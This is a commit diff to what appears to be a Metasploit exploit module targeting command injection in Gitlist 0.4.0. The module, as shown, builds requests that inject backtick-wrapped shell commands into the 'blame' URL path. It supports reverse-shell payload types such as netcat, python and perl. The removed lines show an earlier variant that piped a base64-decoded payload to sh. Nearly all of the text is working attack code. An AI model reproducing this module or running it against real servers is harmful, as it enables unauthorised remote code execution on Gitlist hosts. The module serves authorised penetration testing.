address @jvasquez-r7 review points

brandonprry · brandonprry · commit 6fb2fc85a0ff · 2014-07-03T16:43:01.000-05:00
diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb
@@ -23,7 +23,7 @@ def initialize(info = {})
       'Arch'           => ARCH_CMD,
       'Author'         =>
         [
-          'drone', #discovery/poc @dronesec
+          '@dronesec', #discovery/poc
           'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
         ],
       'References'     =>
@@ -35,21 +35,17 @@ def initialize(info = {})
       'Payload'        =>
         {
           'Space'       => 9999, #arbitrary, length of GET request really
-          'BadChars'    => "", #base64 encode then execute
+          'BadChars'    => "&\x20", 
           'DisableNops' => true,
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
               'RequiredCmd' => 'generic netcat netcat-e python perl',
             }
         },
-      'DefaultOptions' =>
-        {
-          'ExitFunction' => 'none'
-        },
       'Targets'        =>
         [
-          ['Automatic Targeting', { 'auto' => true }]
+          ['Gitlist 0.4.0', { }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 30 2014'
@@ -62,55 +58,43 @@ def initialize(info = {})
   end
 
   def check
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path)
-    })
-
-    if !res
-      fail_with("Server did not respond in an expected way")
-    end
-
-    first = /href="\/gitlist\/(.*)\/"/.match(res.body)
-
-    if !first or first.length < 2
-      fail_with("We don't have a properly configured Gitlist")
-    end
+    chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
 
-    chk = Rex::Text.encode_base64(Rex::Text.rand_text_alpha(rand(32)+5))
+    res = send_command("echo${IFS}" + chk + "|base64${IFS}--decode")
 
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '%22%22`echo${IFS}' + chk + '|base64${IFS}--decode`')
-    })
-
-    if res and res.body =~ /#{Rex::Text.decode_base64(chk)}/
+    if res and res.body.include?(Rex::Text.decode_base64(chk))
       return Exploit::CheckCode::Vulnerable
     end
 
     return Exploit::CheckCode::Safe
   end
 
   def exploit
-    pay = Rex::Text::encode_base64(payload.encoded)
+    send_command(payload.encoded)
+  end
 
+  def send_command(cmd) 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path)
     })
 
-    if !res
+    unless res
       fail_with("Server did not respond in an expected way")
     end
 
     first = /href="\/gitlist\/(.*)\/"/.match(res.body)
 
-    if !first or first.length < 2
+    unless first && first.length >= 2
       fail_with("We don't have a properly configured Gitlist installation")
     end
 
     first = first[1]
 
-    send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '%22%22`echo${IFS}' + pay + '|base64${IFS}--decode|sh`')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '""`' + cmd + '`')
     })
+
+    return res
   end
 
 end
